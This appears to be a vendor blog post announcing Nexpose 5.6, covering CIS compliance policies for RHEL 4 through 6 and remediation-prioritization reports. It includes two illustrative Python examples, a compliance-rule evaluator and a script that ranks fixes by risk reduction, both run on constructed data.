The CIS RHEL policies are included by default in the CIS scan template (as shown below). RHEL 5 & 6 each have two policies, "Level One" and "Level Two". The distinction is that a "Level One" policy is intended to be practical without negatively impacting usability, whereas "Level Two" is designed to provide "defence-in-depth" resilience but may impact the usability of the server. The correct one to evaluate your systems against will depend on the host being assessed, but there is no harm in running both against a host to see how you measure up.

The screenshot below was captured from the device view of an asset scanned with all the RHEL policies. In this case, the host is RHEL 4, so the 5 & 6 policies report as Not Applicable (N/A). The RHEL 4 host is apparently reasonably well configured, as it is 98.59% in compliance with the CIS RHEL 4 benchmark.

Drilling down into the detailed policy results view (below) for that target, we can see that the vast majority of rules were compliant. The rules in these benchmarks cover a broad range of system configuration items, including required and prohibited packages, services which must be disabled or enabled, file permissions on specific executables, and application-specific configuration items.

And if we drill down into a rule (again, below) you can see the outcome with a detailed proof. 
In this case, the rule requires that the Network Information Service (NIS) server is disabled, and we have concluded that the host is compliant because neither the ypserv nor the yppasswdd package is installed.

For more information on Nexpose 5.6, you can look at the release notes.
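The shape of the evaluation just described (a rule that passes or fails with a proof string, N/A when the policy does not apply to the host's release, and a compliance percentage over the applicable rules) can be sketched in a few dozen lines. The following is an added example written for this page, not Nexpose's or CIS's code: the rule set, the package and service names, the file modes and the RHEL 4 inventory are all constructed for illustration, and the four rule kinds only mirror the categories the post lists (required and prohibited packages, services that must be enabled or disabled, file permissions).

```python
"""Added example, not Nexpose or CIS code: a minimal benchmark evaluator in the
shape of the results described in the post. Each rule is checked against a host
inventory and yields pass / fail / n/a plus a proof string; the host score is
the percentage of applicable rules that pass. Rules, package and service names,
file modes and the host inventory are constructed for illustration."""
from dataclasses import dataclass, field


@dataclass
class Host:
    os_version: int                 # RHEL major version
    packages: set                   # installed package names
    services: set                   # services enabled at boot
    file_modes: dict = field(default_factory=dict)  # path -> permission bits


@dataclass
class Rule:
    rid: str
    title: str
    applies_to: tuple               # RHEL versions the rule applies to
    kind: str                       # prohibited_pkg | required_pkg | service_disabled | file_mode_max
    targets: tuple                  # package/service names, or (path, maximum mode)


def evaluate_rule(rule, host):
    """Return (status, proof); status is 'pass', 'fail' or 'n/a'."""
    if host.os_version not in rule.applies_to:
        return "n/a", "rule applies to RHEL %s, host is RHEL %d" % (
            "/".join(map(str, rule.applies_to)), host.os_version)
    if rule.kind == "prohibited_pkg":
        present = sorted(set(rule.targets) & host.packages)
        if present:
            return "fail", "prohibited package(s) installed: " + ", ".join(present)
        return "pass", "none of " + ", ".join(rule.targets) + " installed"
    if rule.kind == "required_pkg":
        missing = sorted(set(rule.targets) - host.packages)
        if missing:
            return "fail", "required package(s) missing: " + ", ".join(missing)
        return "pass", "all of " + ", ".join(rule.targets) + " installed"
    if rule.kind == "service_disabled":
        enabled = sorted(set(rule.targets) & host.services)
        if enabled:
            return "fail", "service(s) enabled at boot: " + ", ".join(enabled)
        return "pass", "none of " + ", ".join(rule.targets) + " enabled at boot"
    if rule.kind == "file_mode_max":
        path, max_mode = rule.targets
        mode = host.file_modes.get(path)
        if mode is None:
            return "n/a", path + " not present on host"
        if mode & ~max_mode:        # any permission bit set beyond the allowed mask
            return "fail", "%s mode %04o exceeds %04o" % (path, mode, max_mode)
        return "pass", "%s mode %04o within %04o" % (path, mode, max_mode)
    raise ValueError("unknown rule kind: " + rule.kind)


def score_host(rules, host):
    """Evaluate every rule; return (compliance percentage, {rid: (status, proof)}).
    N/A rules are excluded from the percentage, as they are in the policy view."""
    results = {r.rid: evaluate_rule(r, host) for r in rules}
    applicable = [s for s, _ in results.values() if s != "n/a"]
    passed = applicable.count("pass")
    pct = round(100.0 * passed / len(applicable), 2) if applicable else 0.0
    return pct, results


# Constructed rules (illustrative; not the benchmark's wording or numbering)
RULES = [
    Rule("nis-server", "NIS server is disabled", (4, 5, 6), "prohibited_pkg", ("ypserv", "yppasswdd")),
    Rule("nis-client", "NIS client is disabled", (4, 5, 6), "prohibited_pkg", ("ypbind",)),
    Rule("cups", "Print server is disabled", (4, 5, 6), "service_disabled", ("cups",)),
    Rule("sshd", "OpenSSH server is installed", (4, 5, 6), "required_pkg", ("openssh-server",)),
    Rule("shadow", "/etc/shadow permissions", (4, 5, 6), "file_mode_max", ("/etc/shadow", 0o600)),
    Rule("avahi", "Avahi is disabled", (6,), "service_disabled", ("avahi-daemon",)),
]

# Constructed RHEL 4 host inventory (not a real scan result)
HOST = Host(os_version=4,
            packages={"bash", "openssh-server", "ypbind"},
            services={"sshd"},
            file_modes={"/etc/shadow": 0o600, "/etc/passwd": 0o644})

if __name__ == "__main__":
    score, results = score_host(RULES, HOST)
    for rule in RULES:
        status, proof = results[rule.rid]
        print("%-4s %-28s %s" % (status, rule.title, proof))
    print("compliance: %.2f%%" % score)
```

Running it prints one line per rule with its proof: the NIS server rule passes with "none of ypserv, yppasswdd installed", the constructed host fails the NIS client rule because ypbind is present, and the RHEL 6-only Avahi rule reports n/a, giving 80.00% over the five applicable rules. Two design choices worth noticing: N/A rules are left out of the denominator, and a file that is absent is reported N/A rather than failed, which you would flip for files the benchmark requires to exist.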

Simplify Vulnerability Management with Nexpose 5.6

We are pleased to announce the next major release of Nexpose, version 5.6. This release focuses on providing you the most impactful remediation steps to reduce risk to your organization and extends our current configuration assessment functionality.

New Look and Feel

The most visible change in Nexpose 5.6 is the new look and feel of the user interface. The action header is now smaller to maximize screen space and usability, and the new colour scheme makes it easier to focus on important areas of the application.

Simplifying Remediation Prioritization

Security teams are often inundated with thousands of vulnerabilities across all their assets through their entire network. One of the major challenges facing security teams is the difficulty in translating known vulnerabilities (the "What") discovered on their network into remediation steps (the "How"). With all of the vulnerabilities on the network, security teams struggle to determine which are the most important to fix and what they need to do to remediate them. There are many different ways that this can be tackled. Organizations can go from the top down the vulnerability list based on security risk using a metric like CVSS, focus on their business-critical systems first, or throw darts at a wall. In all cases, security teams are focusing on fixing each vulnerability individually on the list of assets they care about. When you are getting into the thousands of vulnerabilities, with more coming every day, it becomes almost impossible for security teams to act, as they spend all their time worrying about fires and the next big thing.

The other main problem facing security teams is that they often are not the teams performing the actual remediation. Usually they work with the IT team to apply a patch, upgrade to a new version of the vulnerable software on the affected asset, or perform another mitigation technique. 
The problem is that security and IT teams often speak different languages. As an example, the security administrator managing the vulnerability management program in an organization might notice that there is a serious vulnerability on a specific asset. After determining whether or not the vulnerability was valid (it was!) and determining which IT administrator was responsible for that asset, the security administrator is now responsible for telling the IT admin to patch that host. Simple enough. The security admin will just tell the IT admin, or create a ticket, stating that they need to patch the critical vulnerability CVE-2013-1234 on the asset. They'll probably include the fact that it has a CVSS score of 10.0 and that it's highly critical. All important things to the security admin, but completely useless information to the IT admin. The IT admin is now forced to figure out what all the security mumbo-jumbo means and translate it into something they can understand.

Making it easy for IT teams to take action on vulnerabilities is only the first step. With thousands of vulnerabilities to manage, going through them one by one does not scale, and providing a thousand-page report with all the information in it makes matters worse. For every vulnerability on your network that you solve, even more come in on a day-to-day basis. It is imperative that security teams have a system that allows them to prioritize fixing the right risks that affect their organization.

Not all of the thousands of vulnerabilities that affect a specific organization have different remediation steps. With vulnerability supersedence and product updates, multiple vulnerabilities can often be fixed by performing one step. If an asset has twenty vulnerabilities on it when scanned with Nexpose, but all of them are associated with Adobe Flash, then the solution for all twenty vulnerabilities would be to upgrade the version of Adobe Flash on that host. 
It is a simple solution that solves the problem for the security admin, presents the information in a way that the IT admin understands ("Patch Flash on Host") and moves teams away from treating individual vulnerabilities as the default unit for looking at the data.

It is a powerful way of thinking about managing your vulnerability program. Instead of focusing on vulnerabilities one-by-one, you can ask the question, "What is the one thing I can do that will minimize my security risk the most, and how much will it lower it by?"

Nexpose 5.6 includes two new reports that assist you in making your life easier. The first report is a high-level summary that allows you to see, in a prioritized view, the top 'n' remediation actions that will reduce your level of risk. The report will also provide guidance on how the overall security profile for your organization will improve by applying these remediation steps. These include, as percentages, the following metrics:

Overall Vulnerability Risk (% Reduced)
Number of Assets Remediated
Number of Vulnerabilities with Known Exploits Remediated (% Reduced)
Number of Vulnerabilities associated with Known Malware Kits Remediated (% Reduced)

Like any other report in Nexpose, you can restrict the data in the report to specific Sites, Asset Groups, or vulnerability categories for further configurability and granularity. For example, if you have a Dynamic Asset Group that is configured to only include Windows assets, you can create a remediation report that only lists the prioritized remediations for the Windows assets in your environment. 
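The roll-up described above, many findings collapsing to one solution and solutions ranked by how much risk they remove, with the same metrics and the same asset-group restriction, looks like this as an added example written for this page. It is not Nexpose's own code: the findings, vulnerability identifiers, risk scores and solution names are constructed, and the risk model is a plain sum of per-finding scores rather than Nexpose's.

```python
"""Added example, not Nexpose code: rolling individual vulnerability findings up
into remediation actions and ranking them by the share of risk each removes.
One finding is one vulnerability on one asset with a risk score, the single
solution that fixes it there, and flags for a public exploit / known malware
kit. All findings, identifiers, scores and solution names are constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    asset: str
    vuln_id: str        # constructed identifier, not a real CVE
    risk: float         # risk contributed by this finding
    solution: str       # the one action that fixes this vulnerability on this asset
    exploit: bool       # a public exploit exists
    malware_kit: bool   # a known malware kit targets it


def plan_remediation(findings, top_n=3):
    """Group findings by solution and return the top_n solutions ordered by the
    percentage of total risk they remove, with the other report metrics:
    assets touched, vulnerabilities fixed, and the share of exploitable and
    malware-kit vulnerabilities removed."""
    findings = list(findings)
    total_risk = sum(f.risk for f in findings)
    total_exploit = sum(f.exploit for f in findings)
    total_malware = sum(f.malware_kit for f in findings)

    def pct(part, whole):
        return round(100.0 * part / whole, 1) if whole else 0.0

    groups = defaultdict(list)
    for f in findings:
        groups[f.solution].append(f)

    actions = []
    for solution, fs in groups.items():
        actions.append({
            "solution": solution,
            "assets": sorted({f.asset for f in fs}),
            "vulns_fixed": len(fs),
            "risk_reduced_pct": pct(sum(f.risk for f in fs), total_risk),
            "exploitable_reduced_pct": pct(sum(f.exploit for f in fs), total_exploit),
            "malware_kit_reduced_pct": pct(sum(f.malware_kit for f in fs), total_malware),
        })
    # largest risk reduction first; solution name breaks ties deterministically
    actions.sort(key=lambda a: (-a["risk_reduced_pct"], a["solution"]))
    return actions[:top_n]


# Constructed findings (not real scan data): five Flash findings across two
# Windows hosts, three OpenSSL findings on two RHEL hosts, one kernel finding
# and one Java finding.
FINDINGS = [
    Finding("win-ws-01", "VULN-A1", 9.0, "Upgrade Adobe Flash Player", True, True),
    Finding("win-ws-01", "VULN-A2", 8.0, "Upgrade Adobe Flash Player", True, False),
    Finding("win-ws-01", "VULN-A3", 7.0, "Upgrade Adobe Flash Player", False, False),
    Finding("win-ws-02", "VULN-A1", 9.0, "Upgrade Adobe Flash Player", True, True),
    Finding("win-ws-02", "VULN-A2", 8.0, "Upgrade Adobe Flash Player", True, False),
    Finding("rhel-srv-01", "VULN-B1", 6.0, "Upgrade OpenSSL", False, False),
    Finding("rhel-srv-01", "VULN-B2", 5.0, "Upgrade OpenSSL", False, False),
    Finding("rhel-srv-02", "VULN-B1", 6.0, "Upgrade OpenSSL", False, False),
    Finding("rhel-srv-01", "VULN-C1", 10.0, "Apply vendor kernel patch", True, False),
    Finding("win-ws-02", "VULN-D1", 4.0, "Upgrade Java Runtime", False, False),
]

if __name__ == "__main__":
    for rank, a in enumerate(plan_remediation(FINDINGS), 1):
        print("%d. %s: %d vulns on %s; risk -%.1f%%, exploitable -%.1f%%, malware kits -%.1f%%"
              % (rank, a["solution"], a["vulns_fixed"], ", ".join(a["assets"]),
                 a["risk_reduced_pct"], a["exploitable_reduced_pct"], a["malware_kit_reduced_pct"]))
    # The same report restricted to one asset group, like a Dynamic Asset Group of Windows hosts
    windows_only = [f for f in FINDINGS if f.asset.startswith("win-")]
    for a in plan_remediation(windows_only, top_n=2):
        print("windows only: %s removes %.1f%% of risk" % (a["solution"], a["risk_reduced_pct"]))
```

Ranked by individual severity, the kernel finding (risk 10.0, exploitable) would sit at the top of the queue, but the Flash upgrade removes 56.9% of total risk across two hosts and all of the malware-kit-targeted findings, against 13.9% for the kernel patch, which is the point of looking at solutions rather than vulnerabilities. Feeding in only the win-* assets gives the Windows-only version of the same report.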
This allows you to tailor actionable reports to different IT groups within your organization in a language they understand.

Configuration Compliance Enhancements

Nexpose 5.6 also adds new content within the Policy Manager around configuration assessment. The latest version of Nexpose includes new certified Center for Internet Security (CIS) Benchmarks for the Red Hat Enterprise Linux 4, 5, and 6 operating systems.

We are extending the ability, introduced with the release of Windows CIS policy content in Nexpose 5.5, for organizations to determine their overall level of compliance with common best practices developed by CIS. This is a big deal for organizations who need to measure their level of compliance against known best standards on Red Hat Enterprise Linux hosts.

Determining the overall level of compliance can be a difficult problem to solve for a lot of organizations. They either have to perform the assessment by hand across all of their assets, or use multiple toolsets to pull out this data. Nexpose is flexible to the needs of organizations by allowing users to scan for both vulnerabilities and configuration issues within a unified assessment toolset, minimizing the amount of scan configuration and time required to get vulnerability, application and configuration result data in a low-touch manner. Users can include any combination of policies, old or new, in any scan template.

In addition, if your organization has decided that the included CIS Red Hat Enterprise Linux benchmarks within the product are a great baseline but do not necessarily meet the needs of your organization, you can use our Policy Editor to make modifications to copies of the included policies within Nexpose. You can then include these custom policies in any scan template for inclusion within a scan.

These features are designed to simplify the overall experience for our customers. 
We want you to make informed and intelligent decisions on what you should do next, freeing up time for you to act rather than spending it mining through vulnerability and compliance data or dealing with IT. We know that focusing on a remediation view allows you to build a rapport with the IT teams, maximize risk savings while minimizing work effort, and overall simplify and strengthen the security posture of your organization.

For more information on Nexpose 5.6, you can look at the release notes here.
